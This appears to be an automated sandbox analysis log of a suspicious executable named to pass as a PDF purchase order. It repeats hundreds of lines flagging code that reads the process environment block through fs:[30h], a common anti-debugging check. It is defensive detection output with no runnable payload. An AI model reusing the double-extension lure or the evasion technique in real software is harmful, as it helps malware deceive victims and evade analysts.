Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C0283 mov eax, dword ptr fs:[00000030h]	6_2_019C0283
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C0283 mov eax, dword ptr fs:[00000030h]	6_2_019C0283
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C0283 mov eax, dword ptr fs:[00000030h]	6_2_019C0283
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019502A0 mov eax, dword ptr fs:[00000030h]	6_2_019502A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019502A0 mov eax, dword ptr fs:[00000030h]	6_2_019502A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D62A0 mov eax, dword ptr fs:[00000030h]	6_2_019D62A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D62A0 mov ecx, dword ptr fs:[00000030h]	6_2_019D62A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D62A0 mov eax, dword ptr fs:[00000030h]	6_2_019D62A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D62A0 mov eax, dword ptr fs:[00000030h]	6_2_019D62A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D62A0 mov eax, dword ptr fs:[00000030h]	6_2_019D62A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D62A0 mov eax, dword ptr fs:[00000030h]	6_2_019D62A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0194A2C3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0194A2C3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0194A2C3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0194A2C3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0194A2C3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019502E1 mov eax, dword ptr fs:[00000030h]	6_2_019502E1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019502E1 mov eax, dword ptr fs:[00000030h]	6_2_019502E1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019502E1 mov eax, dword ptr fs:[00000030h]	6_2_019502E1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193823B mov eax, dword ptr fs:[00000030h]	6_2_0193823B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193A250 mov eax, dword ptr fs:[00000030h]	6_2_0193A250
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946259 mov eax, dword ptr fs:[00000030h]	6_2_01946259
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FA250 mov eax, dword ptr fs:[00000030h]	6_2_019FA250
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FA250 mov eax, dword ptr fs:[00000030h]	6_2_019FA250
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C8243 mov eax, dword ptr fs:[00000030h]	6_2_019C8243
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C8243 mov ecx, dword ptr fs:[00000030h]	6_2_019C8243
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F0274 mov eax, dword ptr fs:[00000030h]	6_2_019F0274
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01944260 mov eax, dword ptr fs:[00000030h]	6_2_01944260
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01944260 mov eax, dword ptr fs:[00000030h]	6_2_01944260
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01944260 mov eax, dword ptr fs:[00000030h]	6_2_01944260
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193826B mov eax, dword ptr fs:[00000030h]	6_2_0193826B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E59C mov eax, dword ptr fs:[00000030h]	6_2_0197E59C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01942582 mov eax, dword ptr fs:[00000030h]	6_2_01942582
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01942582 mov ecx, dword ptr fs:[00000030h]	6_2_01942582
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01974588 mov eax, dword ptr fs:[00000030h]	6_2_01974588
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019645B1 mov eax, dword ptr fs:[00000030h]	6_2_019645B1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019645B1 mov eax, dword ptr fs:[00000030h]	6_2_019645B1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C05A7 mov eax, dword ptr fs:[00000030h]	6_2_019C05A7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C05A7 mov eax, dword ptr fs:[00000030h]	6_2_019C05A7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C05A7 mov eax, dword ptr fs:[00000030h]	6_2_019C05A7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019465D0 mov eax, dword ptr fs:[00000030h]	6_2_019465D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0197A5D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0197A5D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E5CF mov eax, dword ptr fs:[00000030h]	6_2_0197E5CF
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E5CF mov eax, dword ptr fs:[00000030h]	6_2_0197E5CF
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0196E5E7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0196E5E7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0196E5E7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0196E5E7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0196E5E7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0196E5E7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0196E5E7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0196E5E7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019425E0 mov eax, dword ptr fs:[00000030h]	6_2_019425E0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197C5ED mov eax, dword ptr fs:[00000030h]	6_2_0197C5ED
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197C5ED mov eax, dword ptr fs:[00000030h]	6_2_0197C5ED
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D6500 mov eax, dword ptr fs:[00000030h]	6_2_019D6500
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950535 mov eax, dword ptr fs:[00000030h]	6_2_01950535
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950535 mov eax, dword ptr fs:[00000030h]	6_2_01950535
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950535 mov eax, dword ptr fs:[00000030h]	6_2_01950535
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950535 mov eax, dword ptr fs:[00000030h]	6_2_01950535
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950535 mov eax, dword ptr fs:[00000030h]	6_2_01950535
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950535 mov eax, dword ptr fs:[00000030h]	6_2_01950535
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14500 mov eax, dword ptr fs:[00000030h]	6_2_01A14500
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14500 mov eax, dword ptr fs:[00000030h]	6_2_01A14500
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14500 mov eax, dword ptr fs:[00000030h]	6_2_01A14500
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14500 mov eax, dword ptr fs:[00000030h]	6_2_01A14500
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14500 mov eax, dword ptr fs:[00000030h]	6_2_01A14500
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14500 mov eax, dword ptr fs:[00000030h]	6_2_01A14500
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A14500 mov eax, dword ptr fs:[00000030h]	6_2_01A14500
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E53E mov eax, dword ptr fs:[00000030h]	6_2_0196E53E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E53E mov eax, dword ptr fs:[00000030h]	6_2_0196E53E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E53E mov eax, dword ptr fs:[00000030h]	6_2_0196E53E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E53E mov eax, dword ptr fs:[00000030h]	6_2_0196E53E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196E53E mov eax, dword ptr fs:[00000030h]	6_2_0196E53E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01948550 mov eax, dword ptr fs:[00000030h]	6_2_01948550
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01948550 mov eax, dword ptr fs:[00000030h]	6_2_01948550
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197656A mov eax, dword ptr fs:[00000030h]	6_2_0197656A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197656A mov eax, dword ptr fs:[00000030h]	6_2_0197656A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197656A mov eax, dword ptr fs:[00000030h]	6_2_0197656A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FA49A mov eax, dword ptr fs:[00000030h]	6_2_019FA49A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019744B0 mov ecx, dword ptr fs:[00000030h]	6_2_019744B0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CA4B0 mov eax, dword ptr fs:[00000030h]	6_2_019CA4B0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019464AB mov eax, dword ptr fs:[00000030h]	6_2_019464AB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019404E5 mov ecx, dword ptr fs:[00000030h]	6_2_019404E5
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01978402 mov eax, dword ptr fs:[00000030h]	6_2_01978402
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01978402 mov eax, dword ptr fs:[00000030h]	6_2_01978402
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01978402 mov eax, dword ptr fs:[00000030h]	6_2_01978402
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193E420 mov eax, dword ptr fs:[00000030h]	6_2_0193E420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193E420 mov eax, dword ptr fs:[00000030h]	6_2_0193E420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193E420 mov eax, dword ptr fs:[00000030h]	6_2_0193E420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193C427 mov eax, dword ptr fs:[00000030h]	6_2_0193C427
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C6420 mov eax, dword ptr fs:[00000030h]	6_2_019C6420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C6420 mov eax, dword ptr fs:[00000030h]	6_2_019C6420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C6420 mov eax, dword ptr fs:[00000030h]	6_2_019C6420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C6420 mov eax, dword ptr fs:[00000030h]	6_2_019C6420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C6420 mov eax, dword ptr fs:[00000030h]	6_2_019C6420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C6420 mov eax, dword ptr fs:[00000030h]	6_2_019C6420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C6420 mov eax, dword ptr fs:[00000030h]	6_2_019C6420
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FA456 mov eax, dword ptr fs:[00000030h]	6_2_019FA456
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196245A mov eax, dword ptr fs:[00000030h]	6_2_0196245A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193645D mov eax, dword ptr fs:[00000030h]	6_2_0193645D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E443 mov eax, dword ptr fs:[00000030h]	6_2_0197E443
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E443 mov eax, dword ptr fs:[00000030h]	6_2_0197E443
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E443 mov eax, dword ptr fs:[00000030h]	6_2_0197E443
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E443 mov eax, dword ptr fs:[00000030h]	6_2_0197E443
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E443 mov eax, dword ptr fs:[00000030h]	6_2_0197E443
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E443 mov eax, dword ptr fs:[00000030h]	6_2_0197E443
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E443 mov eax, dword ptr fs:[00000030h]	6_2_0197E443
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E443 mov eax, dword ptr fs:[00000030h]	6_2_0197E443
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196A470 mov eax, dword ptr fs:[00000030h]	6_2_0196A470
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196A470 mov eax, dword ptr fs:[00000030h]	6_2_0196A470
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196A470 mov eax, dword ptr fs:[00000030h]	6_2_0196A470
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CC460 mov ecx, dword ptr fs:[00000030h]	6_2_019CC460
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E678E mov eax, dword ptr fs:[00000030h]	6_2_019E678E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019407AF mov eax, dword ptr fs:[00000030h]	6_2_019407AF
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019F47A0 mov eax, dword ptr fs:[00000030h]	6_2_019F47A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0194C7C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C07C3 mov eax, dword ptr fs:[00000030h]	6_2_019C07C3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019447FB mov eax, dword ptr fs:[00000030h]	6_2_019447FB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019447FB mov eax, dword ptr fs:[00000030h]	6_2_019447FB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019627ED mov eax, dword ptr fs:[00000030h]	6_2_019627ED
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019627ED mov eax, dword ptr fs:[00000030h]	6_2_019627ED
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019627ED mov eax, dword ptr fs:[00000030h]	6_2_019627ED
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CE7E1 mov eax, dword ptr fs:[00000030h]	6_2_019CE7E1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940710 mov eax, dword ptr fs:[00000030h]	6_2_01940710
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01970710 mov eax, dword ptr fs:[00000030h]	6_2_01970710
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197C700 mov eax, dword ptr fs:[00000030h]	6_2_0197C700
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197273C mov eax, dword ptr fs:[00000030h]	6_2_0197273C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197273C mov ecx, dword ptr fs:[00000030h]	6_2_0197273C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197273C mov eax, dword ptr fs:[00000030h]	6_2_0197273C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BC730 mov eax, dword ptr fs:[00000030h]	6_2_019BC730
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197C720 mov eax, dword ptr fs:[00000030h]	6_2_0197C720
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197C720 mov eax, dword ptr fs:[00000030h]	6_2_0197C720
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019CE75D mov eax, dword ptr fs:[00000030h]	6_2_019CE75D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01940750 mov eax, dword ptr fs:[00000030h]	6_2_01940750
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982750 mov eax, dword ptr fs:[00000030h]	6_2_01982750
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982750 mov eax, dword ptr fs:[00000030h]	6_2_01982750
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C4755 mov eax, dword ptr fs:[00000030h]	6_2_019C4755
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197674D mov esi, dword ptr fs:[00000030h]	6_2_0197674D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197674D mov eax, dword ptr fs:[00000030h]	6_2_0197674D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197674D mov eax, dword ptr fs:[00000030h]	6_2_0197674D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01948770 mov eax, dword ptr fs:[00000030h]	6_2_01948770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01950770 mov eax, dword ptr fs:[00000030h]	6_2_01950770
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01944690 mov eax, dword ptr fs:[00000030h]	6_2_01944690
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01944690 mov eax, dword ptr fs:[00000030h]	6_2_01944690
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019766B0 mov eax, dword ptr fs:[00000030h]	6_2_019766B0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0197C6A6
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0197A6C7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0197A6C7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE6F2 mov eax, dword ptr fs:[00000030h]	6_2_019BE6F2
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE6F2 mov eax, dword ptr fs:[00000030h]	6_2_019BE6F2
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE6F2 mov eax, dword ptr fs:[00000030h]	6_2_019BE6F2
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE6F2 mov eax, dword ptr fs:[00000030h]	6_2_019BE6F2
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C06F1 mov eax, dword ptr fs:[00000030h]	6_2_019C06F1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C06F1 mov eax, dword ptr fs:[00000030h]	6_2_019C06F1
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01982619 mov eax, dword ptr fs:[00000030h]	6_2_01982619
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE609 mov eax, dword ptr fs:[00000030h]	6_2_019BE609
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195260B mov eax, dword ptr fs:[00000030h]	6_2_0195260B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195260B mov eax, dword ptr fs:[00000030h]	6_2_0195260B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195260B mov eax, dword ptr fs:[00000030h]	6_2_0195260B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195260B mov eax, dword ptr fs:[00000030h]	6_2_0195260B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195260B mov eax, dword ptr fs:[00000030h]	6_2_0195260B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195260B mov eax, dword ptr fs:[00000030h]	6_2_0195260B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195260B mov eax, dword ptr fs:[00000030h]	6_2_0195260B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E627 mov eax, dword ptr fs:[00000030h]	6_2_0195E627
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01976620 mov eax, dword ptr fs:[00000030h]	6_2_01976620
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01978620 mov eax, dword ptr fs:[00000030h]	6_2_01978620
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194262C mov eax, dword ptr fs:[00000030h]	6_2_0194262C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0866E mov eax, dword ptr fs:[00000030h]	6_2_01A0866E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0866E mov eax, dword ptr fs:[00000030h]	6_2_01A0866E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195C640 mov eax, dword ptr fs:[00000030h]	6_2_0195C640
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01972674 mov eax, dword ptr fs:[00000030h]	6_2_01972674
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A660 mov eax, dword ptr fs:[00000030h]	6_2_0197A660
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A660 mov eax, dword ptr fs:[00000030h]	6_2_0197A660
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C89B3 mov esi, dword ptr fs:[00000030h]	6_2_019C89B3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C89B3 mov eax, dword ptr fs:[00000030h]	6_2_019C89B3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C89B3 mov eax, dword ptr fs:[00000030h]	6_2_019C89B3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019529A0 mov eax, dword ptr fs:[00000030h]	6_2_019529A0
